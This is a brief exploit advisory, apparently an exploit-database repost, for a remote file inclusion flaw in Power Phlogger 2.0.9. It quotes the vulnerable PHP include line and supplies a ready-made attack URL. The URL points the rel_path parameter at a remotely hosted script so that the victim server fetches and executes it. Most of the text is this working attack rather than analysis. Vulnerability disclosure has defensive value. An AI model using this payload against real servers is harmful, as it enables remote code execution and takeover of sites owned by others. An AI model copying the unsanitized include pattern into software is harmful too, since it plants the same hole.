id: 1030
date: 10/18/2006
title: Power Phlogger <= 2.0.9 (config.inc.php3) File Include Vulnerability
author: x_w0x
cves: 

====================================================================
Power Phlogger <= 2.0.9 (config.inc.php3) File Include Vulnerability
====================================================================



#################################
# Power Phlogger 2.0.9 -        #
#################################
#Class:     Remote|Local File Include Vulnerability
# Remote:    Yes
# Local:     No
# Type:      High
# Author:    x_w0x
###################################
#Vuln Code
(config.inc.php3):
<?php
include $rel_path."functions.php3";//nothing here
?>

#
http://victim.com/[Power Phlogger 2.0.9]/config.inc.php3?rel_path=http://DarknesseScript.txt



#  0day.today [2023-03-26]  #